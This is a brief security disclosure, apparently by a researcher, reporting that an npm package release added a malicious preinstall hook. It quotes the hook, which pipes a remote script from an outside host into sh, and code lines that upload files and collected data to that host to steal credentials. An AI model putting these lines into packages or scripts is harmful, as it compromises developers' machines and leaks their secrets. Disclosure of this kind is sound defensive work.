Hey, I'm a security researcher from https://mend.io
This malicious code was found by us at https://Mend.io using our Supply Chain Defender technology
Looking at the diff here: https://my.diffend.io/npm/@dydxprotocol/solo/0.41.0/0.41.1
A preinstall was added:
"preinstall": "curl -s http://api.circle-cdn.com/ci.js | sh",
but this script contains a code that looks malicious:
subprocess.getoutput("curl -X POST http://api.circle-cdn.com/uploader.php -F 'uploaded_file=@" + filename2 + "' -F 'submit=Upload'") subprocess.getoutput('curl -X POST http://api.circle-cdn.com/api.php -d "textdata=' + allen + '"')
it seems to be stealing credentials and other secrets.
This applies to other packages of the ecosystem as well.